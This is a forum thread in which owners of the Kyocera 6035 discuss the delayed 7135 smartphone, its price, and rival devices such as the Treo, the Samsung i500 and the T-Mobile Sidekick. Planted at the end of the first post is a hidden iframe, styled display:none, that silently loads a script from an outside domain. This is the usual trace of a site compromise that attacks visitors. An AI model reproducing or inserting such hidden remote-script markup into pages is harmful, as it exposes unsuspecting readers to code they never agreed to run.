Based on the info at this board, i.e. a possible $600 price tag, and about another month's delay, I've gotta say KYO took too long. I know I have several posts here along the same lines, but there's just too many products out there that offer many impressive features for quite a bit less. I'm a loyal 6035 user, but I'll probably just use that a bit longer and buy a much cheaper samsung with color screen or the like.
I'm on Sprint, so I could be leaving them soon just to get a much better deal somwhere else (I'm out of contract.) I'll still follow this board, but technology just changes too fast to pin it on a model that's not even out yet, when some product with much less fanfare is probably right around the corner.
Good Luck all.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I don't think that it is Kyo taking too long, I think it has been in the carriers hands for quite some time. They are the ones stalling to make sure all is ready for a roll out.
You are scaring me. Before we even get the next greatest thing (7135) you're already making me feel like it is obsolete! Now I'm all second guessing and wondering if I should wait to see what is behind door #2 instead. I've got to control my bleeding edge frame of mind and know that the 7135 is everything I need and that at some point there will always be something better.
I WILL love the 7135 and be totally satisfied for a long time. I WILL. I think I can, I think I can.

I'm constantly reviewing my options. Treo is close, but single mode is not enough. Also, when I press on the screen with my finger it makes a concentric wave. Don't like that. T-Mobile PPCPE is close, but from what I gather, 32 megs isn't enough (even with an expansion slot) for pocketpcs. Users are going through extensive lengths to remove the t-mobile apps which gives them back another 3 megs. The i330 would have been nice last february, but I'm wanting a protected screen. So that leaves the 7135 or the i500. I'd be happy with either one only the 7135 will have a big user support site whereas i500 users will be stuck in some "Off Topic" forum.

I like the way you think Steve! If your hypothetical "7195" were to be released within the next year I'd wait for it, and I would be willing to pay $700.00 for it too!
Well, after using a 6035 for about 2 yrs, and lusting after the 7135 for quite some time, I couldn't resist color, and two months ago, went to the Treo. (point here is not to flame one or the other). The delay in the 7135, coupled with my lack of resolve, pushed me the other way (hope I get some of that resolve back when the 7135 finally DOES come out). I guess what I'm saying is that I too could wait no longer.
I personally feel that though it is EXTREMELY painful waiting for the 7135, in a matter of weeks, it will be here. We will soon forget all about the pain, because we will have it in our hands.
And I swear, we will all agree that it was well worth the wait.
Hang in there people, we'll soon be satisfied.
Well, at the risk of incurring the wrath (and the ire) of the 7135-lovers here (and I was/am one, actually), I have to say that I'm very happy. I don't <think> I miss the MP3 stuff (don't have one now, am not really MP3-centric), and the expansion slot? Well, it might be a case of "don't have it, so don't need it'. If I had a slot, I'd probably find a use for it, end up depending on it, wonder how I ever got along without it.
Bottom line - I HAVE the Treo, and the screen on the 6035 was killing me. If I had waited on the 7135, I'd still be waiting. And waiting.
All I have to say is... I hope all you people switching your carriers because of "equipment" (I'm mainly poking at T-mobile here) don't travel...
I've been a 6035 user from launch, and yes I too have been waiting patiently for the 7135. Remember gang color is a nicety, not a necessity. The memory thing.. big deal.. I haven't used up all of the 8mb in the 6035 yet. MP3 player.. nice and we'll see... midi ringer tones... cool, but really I'm after the compact flip over with the same functionality. The only real add on that I hope to see is the ability to search the internet high speed, and not get "web page does not support browser" (refferring to qualcomm's current web browser, and yes I find the blazer to slow at the current 14.4)
Other than that I'd still be satisfied with the 6035.
Well, this may be your opinion:
"Remember gang color is a nicety, not a necessity"
but for me, it was critical. Truly, the color screen is absolutely important. Don't get me wrong - I used my 6035 all the time, and I loved it when I had it. But - having a color screen makes all the difference. Yes - I know, the 7135 will have 65000 colors, but I have my color device NOW.
had we not known about the 7135 until it was released, we would be shocked an excited! the fact that we have known for so long makes the rollout painfully slow... :drink3

Makes you wonder why Kyocera would announce it in June when they knew that the carrier(s) still had to do testing. If Verizon is so concerned with not setting unrealistic expectations for release dates (as we've seen in other threads), why do they allow manufacturers to "announce" the product long before Verizon will be ready to sell? Maybe they have no control over that, but it seems unlikely that they have no say in when Kyocera, etc. can "announce" their new products.
I, too, have to admit that my excitement for the 7135 has long since waned and I probably will not run right out and buy it (as I would have if it came in two months ago). The long wait has allowed the voice of reason (re: $$$) to take over my head. :bawling
So that leaves the 7135 or the i500. I'd be happy with either one only the 7135 will have a big user support site whereas i500 users will be stuck in some "Off Topic" forum.
The i500 definitely looks interesting with thinner size and lighter weight. Also, I've been very happy with Samsung phones. However, battery life is unknown/unrated, and perhaps suspect; and it's unknown when/if it will be available on Verizon. Even with 7135 delays it should be on the VZ network well before the i500, no?

I'm with Marctronixx on this one.
When the 6035 came out I discovered it accidentally on the internet, called Verizon to see if they had it, and went out that same night to buy it.
If it wasn't for this forum (which I discovered months ago) I wouldn't even know about the 7135. I love my 6035 and am content until the new one comes out. I tend to support companies I'm happy with. Never been with any other service provider except Verizon and the only other cell phone manufacturer I've used is Samsung so the i500 does intrigue me but I'm holdin' out for my 7135.
Im filling this awkward gap until the 7135 comes out with the T-Mobile Sidekick--I hope everyone has at least looked at it ($200+40/month unlimited web).
Well, to all of you who have given up on the wait, all I can say is, in spite of the pain of the lengthy wait, there still is nothing out there to compare.
I'm going to wait for as long as it takes or until another smartphone is released that I like better (which I doubt is going to happen).
I'm still very eager and my excitement for this smartphone hasn't diminshed one bit.
Folks, I feel your pain. Two weeks ago, I went through 8, yes 8 different 6035s before I finally got one to worked right (various problems). I almost gave up then, changing carriers and phones. But there is not much out there to compete with the 7135. I have been talking with all the local Verizon people here in Colorado Springs trying to get an edge (social engineer) on the 7135 and they seem to be "in the dark" on its pending release. I have the "New Every Two" option currently available and everything I talk with a Verizon sales-person, they try to talk me into other phones but I learned a long time ago to not settle for my second or third choice because I will ultimately not like it and have to purchase what I really want later. So I'm going to stick it out, at least as long as my current 6035 continues to work right. Heck I may even wait a bit after the 7135 is released to make sure all the bugs get worked out. But then maybe not!!! J
Attention your carries out there, Bring on the 7135!!!!

Enjoy the journey, it should be just as much fun as the destination.
My verizon contact tells me that they had battery problems that they fixed and now some signal strength issues to work through.
I would not want a phone that has problems and ticks me off, rather I would want one that performs like the 6035 does. I do not want a 6035 with a color screen (like the mildy redisgned i330?), or a single mode treo.
Man, we all know this totally redesigned phone is gonna' be the BOMB !!!!!
